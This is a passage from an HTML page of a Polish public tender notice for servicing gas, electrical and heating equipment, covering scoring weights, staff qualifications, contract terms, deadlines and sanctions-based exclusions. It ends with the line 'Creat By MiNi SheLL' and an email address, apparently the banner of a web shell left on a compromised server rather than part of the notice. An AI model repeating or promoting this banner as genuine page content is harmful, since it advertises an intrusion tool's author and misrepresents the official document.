liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium marża 20 % M min – najniższa zaproponowana marża wśród ofert niepodlegających odrzuceniu<br/>M of. - zaproponowana wartość marży w badanej ofercie <br/><br/>UWAGA: W przypadku niewskazania w ofercie marży w ogóle – oferta zostanie odrzucona.<br/><br/><br/><br/>Sposób wyboru najkorzystniejszej oferty:<br/><br/>Najkorzystniejsza oferta = oferta z największą liczbą punktów LP<br/>LP = CO + C r + M o <br/>gdzie: LP – wyliczona ilość punktów badanej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena roboczogodziny dla napraw awaryjnych i eksploatacyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">marża</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej:<br/><br/>w zakresie części nr 1,2,3,4,5<br/>Zamawiający uzna, że Wykonawca spełnił ww. warunek, jeżeli wykaże, że:<br/><br/>a)	skieruje do realizacji zamówienia:<br/><br/>- co najmniej 1 osobę posiadającą uprawnienia kwalifikacyjne do wykonywania prac w zakresie obsługi, konserwacji, napraw, kontrolno pomiarowych, montażowych w zakresie urządzeń, instalacji i sieci gazowych serii E i D<br/>- co najmniej 1 osobę posiadającą uprawnienia kwalifikacyjne do wykonywania prac kontrolno-pomiarowych w zakresie urządzeń, i sieci elektroenergetycznych serii E i D do 1 kV. <br/>- co najmniej 1 osobę posiadającą uprawnienia kwalifikacyjne do wykonywania prac w zakresie obsługi, konserwacji, napraw, kontrolno-pomiarowych, montażowych w zakresie urządzeń wytwarzających, przetwarzających, przesyłające i zużywające ciepło oraz inne urządzenia energetyczne serii E i D <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Potwierdzających spełnianie warunków udziału w postępowaniu dotyczących:<br/><br/>zdolności technicznej lub zawodowej:<br/> W ZAKRESIE CZĘŚCI NR 1,2,3,4,5:<br/><br/>1)	WYKAZ OSÓB, skierowanych przez Wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialnych za świadczenie usługi wraz <br/>z informacją na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia publicznego, tj.: Wykonawca wykaże, że dysponuje: <br/>- co najmniej 1 osobę posiadającą uprawnienia kwalifikacyjne do wykonywania prac w zakresie obsługi, konserwacji, napraw, kontrolno pomiarowych, montażowych w zakresie urządzeń, instalacji i sieci gazowych serii E i D<br/>- co najmniej 1 osobę posiadającą uprawnienia kwalifikacyjne do wykonywania prac kontrolno-pomiarowych w zakresie urządzeń, i sieci elektroenergetycznych serii E i D do 1 kV. <br/>- co najmniej 1 osobę posiadającą uprawnienia kwalifikacyjne do wykonywania prac w zakresie obsługi, konserwacji, napraw, kontrolno-pomiarowych, montażowych w zakresie urządzeń wytwarzających, przetwarzających, przesyłające i zużywające ciepło oraz inne urządzenia energetyczne serii E i D. – według wzoru WYKAZU OSÓB – Załącznik nr 8 do ZO</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zobowiązanie podmiotu udostępniającego zasoby (jeżeli dotyczy danego wykonawcy) – zgodnie z art. 123 ustawy Pzp (składa się z ofertą)- Wykonawca nie może, po upływie terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby - wzór stanowi załącznik nr 6 do SWZ<br/><br/>Oryginał pełnomocnictwa w przypadku, gdy ofertę i załączniki podpisuje ustanowiony pełnomocnik <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, zgodnie z art. 117 ustawy Pzp, gdy zamawiający wymaga posiadania uprawnień zawodowych czy też wykształcenia, kwalifikacji zawodowych lub doświadczenia, a warunki udziału w postępowaniu spełniają tylko poszczególni wykonawcy wspólnie ubiegający się o zamówienie, należy dołączyć do oferty oświadczenie, z którego wynikać będzie, jakie konkretne roboty budowlane/dostawy/usługi wykonają określeni wykonawcy – a więc kto co konkretnie zrobi w trakcie wykonywania zamówienia. (z treści oświadczenia winno wynikać, którą część zamówienia wykonają poszczególni wykonawcy wspólnie ubiegający się o udzielenie zamówienia – dotyczy również wspólników spółki cywilnej) - wzór stanowi załącznik nr 7 do SWZ<br/><br/>W przypadku składania oferty przez wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, oświadczenia i dokumenty wymienione w Rozdziale XII A pkt 4 ppkt 2) (oświadczenie art. 125), ppkt 7) (oświadczenie wspólnie ubiegających się ), składa każdy z wykonawców.<br/><br/>W przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>Wspólnicy spółki cywilnej traktowani są jako wykonawcy wspólnie ubiegający się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres, charakter zmian oraz warunki wprowadzenia zmian umowy zostały określone we wzorze umowy stanowiącym załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/32wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-09 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:<br/>B.	Nie podlegają wykluczeniu, w okolicznościach, o których mowa w art. 7 ust.1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2024 poz. 507 t. j.)<br/>1.	Zgodnie z ustawą z dnia 13 kwietnia 2022r. (poz. 507 t. j. ) o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego - wykluczeniu podlegają osoby i podmioty wpisane na listę, wobec których stosowane są środki, o których mowa w art. 1, ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, lista prowadzona przez ministra właściwego do spraw wewnętrznych. Lista publikowana jest w Biuletynie Informacji Publicznej na stronie podmiotowej ministra właściwego do spraw wewnętrznych. <br/>2.	W związku z art. 7 ustawy z dnia 13 kwietnia 2022r. (poz. 507) o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy <br/>z dnia 11 września 2019 r – Prawo zamówień publicznych wyklucza się :<br/>1)	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych <br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2)	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym <br/>w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124, 1285, 1723 i 1843) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3)	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120, 295 i 1598) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.<br/>3. W przypadku wykonawcy wykluczonego na podst. ust. 2 pkt 1),2),3) Zamawiający odrzuca ofertę takiego wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com